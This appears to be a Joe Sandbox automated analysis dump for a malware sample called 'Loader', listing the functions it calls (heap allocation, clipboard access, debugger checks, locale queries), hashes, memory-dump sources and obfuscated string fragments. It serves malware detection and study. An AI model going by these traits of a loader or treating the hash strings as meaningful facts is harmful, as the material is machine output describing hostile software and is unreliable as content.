                                                                                                  • Opcode ID: 275ed814c6ea69910ae1a72d27b0a231c24401e58276d5ee9ab4c8b1dd4c4834
                                                                                                  • Instruction ID: e532a04f91e1c0b613cddcebbc95f0a4606e7abe3f570fcd5c2709e08d40f487
                                                                                                  • Opcode Fuzzy Hash: 275ed814c6ea69910ae1a72d27b0a231c24401e58276d5ee9ab4c8b1dd4c4834
                                                                                                  • Instruction Fuzzy Hash: 6211C07020C3C18BDB359B3898987EBBBD5AF96320F184A6EC5D8C7281DB384446CB16
                                                                                                  APIs
                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B3D6,00000000,0040B4C3,?,00000000,?,00000000), ref: 0043D732
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 8d2a62c6ff4878a5f8aa751b0b6bd2a6ce9445bd91c5585b111d0674ba082357
                                                                                                  • Instruction ID: 002b4fca800d09750e89c68bd020cf53be10a61464b1328bca680c68ba109839
                                                                                                  • Opcode Fuzzy Hash: 8d2a62c6ff4878a5f8aa751b0b6bd2a6ce9445bd91c5585b111d0674ba082357
                                                                                                  • Instruction Fuzzy Hash: 71E02B36518211EBC2102B257C15B1B7B68DFCA721F06083AF500A3169DF39E811C6DF
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BlanketProxy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3890896728-0
                                                                                                  • Opcode ID: f0ec1628aca66818f915ec8d4442d220a92200540676240a28a2eddcb9d649d0
                                                                                                  • Instruction ID: 84e30310f2f982f17f92ac509edff7311f222d9fc3baaa0855203173a86c0fb6
                                                                                                  • Opcode Fuzzy Hash: f0ec1628aca66818f915ec8d4442d220a92200540676240a28a2eddcb9d649d0
                                                                                                  • Instruction Fuzzy Hash: 07F012B4648701CFE314DF24D55571ABBF1FB89704F10981CE4998B394CB799A49CF81
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BlanketProxy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3890896728-0
                                                                                                  • Opcode ID: a2aa4c621b38b15d1a62acee836a07d6a896c74893e7fbc0d002125b44d4f2f0
                                                                                                  • Instruction ID: e2f962abed74b202d84d48e781c2465a62ff3ed4bca4fe6888de31dc8aa490aa
                                                                                                  • Opcode Fuzzy Hash: a2aa4c621b38b15d1a62acee836a07d6a896c74893e7fbc0d002125b44d4f2f0
                                                                                                  • Instruction Fuzzy Hash: DBF0FEB41097418FD310DF24D4A871BBBF0FB85308F10881CE4A98B390D7B5A948CF86
                                                                                                  APIs
                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CAE3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2538663250-0
                                                                                                  • Opcode ID: e3328d60e13e08763a590f607267decf3ed7e7b0a47b7ce5f4a56b377a9a0e7d
                                                                                                  • Instruction ID: dbdd9efffb7d88f247d15ae5fb55354d3de962881ecde9a03d88c8b6cc828a37
                                                                                                  • Opcode Fuzzy Hash: e3328d60e13e08763a590f607267decf3ed7e7b0a47b7ce5f4a56b377a9a0e7d
                                                                                                  • Instruction Fuzzy Hash: EDD0A7355605447BD300A76DEC87F263A2CD383715F80033DF6B2D61D1DD50B810D6A9
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,0043D74B,?,0040B3D6,00000000,0040B4C3,?,00000000,?,00000000), ref: 0043BB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 3161d0ef386faad1ba3affe2a7e72304e0edea796f445b83e932b93f087e1c1a
                                                                                                  • Instruction ID: d5ae91fbceb27689ec3d00fc71b5606d02084d00300c79febeff79db76b4e50a
                                                                                                  • Opcode Fuzzy Hash: 3161d0ef386faad1ba3affe2a7e72304e0edea796f445b83e932b93f087e1c1a
                                                                                                  • Instruction Fuzzy Hash: 4FD0C93540A122FBC6502B19BC15BCB7A949F49221F0749A5B4406A0B5D674DC918AD8
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,?,004088C0,DED9EF53), ref: 0043BB20
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: c216a67e57b3405da71f45c1bfe1bc1fecfc42553cfdfabce731ac237666b504
                                                                                                  • Instruction ID: 388a8f3e4fedbc6b1fb826c6b697f44c03bb29f784dc96c54f45adbfa6eafd7a
                                                                                                  • Opcode Fuzzy Hash: c216a67e57b3405da71f45c1bfe1bc1fecfc42553cfdfabce731ac237666b504
                                                                                                  • Instruction Fuzzy Hash: 4AC09B31049121FBC5106B15FC05FC67F54DF55355F050495B404670F5C760AC41C6D8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HyN$!/$"5$#T'Z$2QB$A*$Y`=f$bc$bu$cPeV$e,g2$e\fb$gd$lino$th$HN$LR
                                                                                                  • API String ID: 0-807189241
                                                                                                  • Opcode ID: 2d4e2d35a814bced3b3636d7d8501cbb3f55474373eb71028de02c5461902543
                                                                                                  • Instruction ID: 57374753a14dd50accee7fbad0f06b7c84733402f04cc10fcb83c99e163f5e09
                                                                                                  • Opcode Fuzzy Hash: 2d4e2d35a814bced3b3636d7d8501cbb3f55474373eb71028de02c5461902543
                                                                                                  • Instruction Fuzzy Hash: B39260B560C3918AD334CF28D8417ABBBF1FBD2300F41892DD4D99B251D7799A46CB8A
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?), ref: 0042799E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: .C-]$5KVA$SV[Q$Y^\`$`}B$p$r}B
                                                                                                  • API String ID: 237503144-3694369797
                                                                                                  • Opcode ID: 0dd9e538bd84b710ec81afcd3d73be0cf9762a772466ced3b5c5d906055036bd
                                                                                                  • Instruction ID: f8153a2963346a3c4f8f0f3999a241bc14663e1250d6f919a9210c5b318ab86f
                                                                                                  • Opcode Fuzzy Hash: 0dd9e538bd84b710ec81afcd3d73be0cf9762a772466ced3b5c5d906055036bd
                                                                                                  • Instruction Fuzzy Hash: E022F1B5A08351CFD3108F29E88072BB7E1EF8B314F56897DE495A7391D735A804CB8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )|8r$2h;n$4`2f$6\1R$=d1z$BU$O$u-=)$rB
                                                                                                  • API String ID: 0-3561239838
                                                                                                  • Opcode ID: 976204580b75eea79d519b1cceeec9299caff96ec0e08137251f8d38ce9bb3d1
                                                                                                  • Instruction ID: 44659da7a58bffa910c0fd2fd1991b5534d8bb96e5934085409a7f6150a94b63
                                                                                                  • Opcode Fuzzy Hash: 976204580b75eea79d519b1cceeec9299caff96ec0e08137251f8d38ce9bb3d1
                                                                                                  • Instruction Fuzzy Hash: 7A12F0B5B083508BD7249F28E84176BB7E1FBC6314F45893DE48997341EB78A901CB8B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$2106D7020EE20555E1B71982A10B646A$>?$ARsp$IFBI$QBMB$g
                                                                                                  • API String ID: 0-1850934352
                                                                                                  • Opcode ID: 39a52745a593c21182c18f0015e1fe8be405a908f18c0e3ae1eed51a1b0b8c26
                                                                                                  • Instruction ID: 4ed9560b1f06c9358b6dfc473aff5ca0cce812477f736f0191d570df79638fa9
                                                                                                  • Opcode Fuzzy Hash: 39a52745a593c21182c18f0015e1fe8be405a908f18c0e3ae1eed51a1b0b8c26
                                                                                                  • Instruction Fuzzy Hash: B5C1147160C3408BD718CF25D89166FBBE2EBD1308F18892EF5D59B381DA39C906CB5A
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1494355150-0
                                                                                                  • Opcode ID: bf2b881bf281171c9d80926ab815c048d09764669e64f39dfbaddd0b92a499c4
                                                                                                  • Instruction ID: 10706e52b29aa6f4c2fc55eeb0f9a6ed81c134b4e532b55050d0803d3f56f37e
                                                                                                  • Opcode Fuzzy Hash: bf2b881bf281171c9d80926ab815c048d09764669e64f39dfbaddd0b92a499c4
                                                                                                  • Instruction Fuzzy Hash: B241C27150C7828EC310AF7C8A4822FBFE06F96324F044A2EF4D5962D2D6B88549D797
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: O$(vt$(]$*+$,[B$L&$rsp
                                                                                                  • API String ID: 0-3823200753
                                                                                                  • Opcode ID: 6b27d569a1358946890cb5d852d2de414d2233efdbbfc09ecd21cecc045567cc
                                                                                                  • Instruction ID: 55c153b773319b370570fe87994eaf7fc4aa01ada6c36f5296d3a0b47ba10f96
                                                                                                  • Opcode Fuzzy Hash: 6b27d569a1358946890cb5d852d2de414d2233efdbbfc09ecd21cecc045567cc
                                                                                                  • Instruction Fuzzy Hash: A9810EB598D7808FE320DF65818038EBAE1FB92304F54A91CE6E96B225D7B98105CF47
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,00D4AB6D,?,00000000), ref: 00D4B250
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,00D4AB6D,?,00000000), ref: 00D4B279
                                                                                                  • GetACP.KERNEL32(?,?,00D4AB6D,?,00000000), ref: 00D4B28E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 73fbb39909b10f7572f3357f9be20b62d0dd7cb0130b50acfa3fd77098ad2c1f
                                                                                                  • Instruction ID: 12211e599adba2b564d31649dd473cea1bd023f344e81f659e69991d4562734d
                                                                                                  • Opcode Fuzzy Hash: 73fbb39909b10f7572f3357f9be20b62d0dd7cb0130b50acfa3fd77098ad2c1f
                                                                                                  • Instruction Fuzzy Hash: 3221B8227002009BDB348F65C981B9F77A6EF74B74B5E4526E949DB214E772DE40C374
                                                                                                  APIs
                                                                                                    • Part of subcall function 0043D760: LdrInitializeThunk.NTDLL(0044095A,00000002,00000018,?,?,00000018,?,?,?), ref: 0043D78E
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419F6A
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419FEB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                  • String ID: NO$Wuv7
                                                                                                  • API String ID: 764372645-2251228920
                                                                                                  • Opcode ID: ddb277853f3d7b4b4c086d3fc3affa3f2e505fe11e886f0c5a8c988f89603a25
                                                                                                  • Instruction ID: 8f2d08c20d0872089e81bf27488a285f42f51548798f678bc05426a8657250db
                                                                                                  • Opcode Fuzzy Hash: ddb277853f3d7b4b4c086d3fc3affa3f2e505fe11e886f0c5a8c988f89603a25
                                                                                                  • Instruction Fuzzy Hash: E482E3347493409FE7248B64C8847ABBBE2ABD6310F28842DE4C587396D7799C91CB5B
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 00D4AB3F
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D4AB7D
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D4AB90
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00D4ABD8
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00D4ABF3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  • Opcode ID: 5aa65f54b1953f985d331977e8eb3d5ae17fff187eac576dc34efcdd343f705f
                                                                                                  • Instruction ID: e26e11fe08b71ad3647ddab8a869fb332a512916b52f0625e03c7b66b26e2897
                                                                                                  • Opcode Fuzzy Hash: 5aa65f54b1953f985d331977e8eb3d5ae17fff187eac576dc34efcdd343f705f
                                                                                                  • Instruction Fuzzy Hash: 68516F71A40209AFDB10DFA9CC85ABE77B9EF14701F084569E941EB191E770DA44CB72
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,D797D5F1), ref: 00423B72
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,D797D5F1,D797D5F1), ref: 00423BE2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: qx$=B
                                                                                                  • API String ID: 237503144-3206994183
                                                                                                  • Opcode ID: 91eb9785edd60ac935ae081d44f8ca4532ee0298940d38b6b433524e14b33d7f
                                                                                                  • Instruction ID: e37f02667e8c6cc61e9b02e0e6b3364f21dedfd4e9ad58bcad86f01aad785cec
                                                                                                  • Opcode Fuzzy Hash: 91eb9785edd60ac935ae081d44f8ca4532ee0298940d38b6b433524e14b33d7f
                                                                                                  • Instruction Fuzzy Hash: 138124B5A003298FEB10CFA4DC8179EBBB1FB45710F154129E949AB282D77599068BD1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$>?$ARsp$IFBI$QBMB
                                                                                                  • API String ID: 0-176169714
                                                                                                  • Opcode ID: 272e3c3baf02b27a57576c6a0b51546635e96302ce9dfff9207d5c5776c69f41
                                                                                                  • Instruction ID: 8534c08d75fc9a11dcd13b64fe8bd195b731931e742b428b1880d5704ac37dfc
                                                                                                  • Opcode Fuzzy Hash: 272e3c3baf02b27a57576c6a0b51546635e96302ce9dfff9207d5c5776c69f41
                                                                                                  • Instruction Fuzzy Hash: 4891047164C3408BD718CF65D89266FBBE2EBD1308F14882DF5D59B381DA3989068B5A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                  • Instruction ID: 9e6a83295ab796a3278f1d02f71d01fb70d87e40b0c787915c00f6039d8409a4
                                                                                                  • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                  • Instruction Fuzzy Hash: D2020BB1E012199BDB14CFADD8806AEFBF1FF48314F298269E515E7341D731AA458BA0
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D39A7F
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00D39B4B
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D39B64
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00D39B6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: 40baa707e00af431826123cbb8908d0f484746716394040289c985218bfbd293
                                                                                                  • Instruction ID: 33e727686362e96c2399b76567f4c31698e8b41c058c68c9a0c3e1d6d1403421
                                                                                                  • Opcode Fuzzy Hash: 40baa707e00af431826123cbb8908d0f484746716394040289c985218bfbd293
                                                                                                  • Instruction Fuzzy Hash: 4631F775D053189BDB21EFA4D9497CDBBB8AF08300F1041EAE40CAB250EBB09B84CF55
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004281DE
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042823F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: 67
                                                                                                  • API String ID: 237503144-1886922373
                                                                                                  • Opcode ID: edf6b4cb604ab90fb683270a59e974a061272f8b0b8f812bf9ce1b76b24096c3
                                                                                                  • Instruction ID: 4f532411486c9b8f9b2e78a8e8c76ab4905e6047a2eafc4a656dd5c5ee150ec6
                                                                                                  • Opcode Fuzzy Hash: edf6b4cb604ab90fb683270a59e974a061272f8b0b8f812bf9ce1b76b24096c3
                                                                                                  • Instruction Fuzzy Hash: C0D1FF716083218FD720DF28D851B6FB7E2EFC5314F05892DE9999B381E7B49505CB86
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: O$[$%$_Y
                                                                                                  • API String ID: 0-3385313786
                                                                                                  • Opcode ID: ac41676442f33c010beadfc2570ddbdad94acfdb7952ab79d2ce312c1e286e63
                                                                                                  • Instruction ID: 539130e2fe6c279b5d1668b9563a0a45e25c412c29af1c9c24e19c64180b8814
                                                                                                  • Opcode Fuzzy Hash: ac41676442f33c010beadfc2570ddbdad94acfdb7952ab79d2ce312c1e286e63
                                                                                                  • Instruction Fuzzy Hash: 999124B2A083508FD314DF68D88176BB7E2AF95304F44896EF5D18B391DB78D841CB4A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ddg$[)^+$f-./
                                                                                                  • API String ID: 0-1799054822
                                                                                                  • Opcode ID: 47f42eaa36760ffd118ac33e81c4a6798d9596c72952d786d850ec147c6d4cf5
                                                                                                  • Instruction ID: 046b2fc63c0d4aa5a93169ad51a43081532c3a98a5611b0ee8d7328c42d2e221
                                                                                                  • Opcode Fuzzy Hash: 47f42eaa36760ffd118ac33e81c4a6798d9596c72952d786d850ec147c6d4cf5
                                                                                                  • Instruction Fuzzy Hash: EF5157B6A193518BC724CF25C8806A7B7F1EFC6304F08996DE4D68B345E3788844CB97
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: 4$PLR3
                                                                                                  • API String ID: 2994545307-2679654426
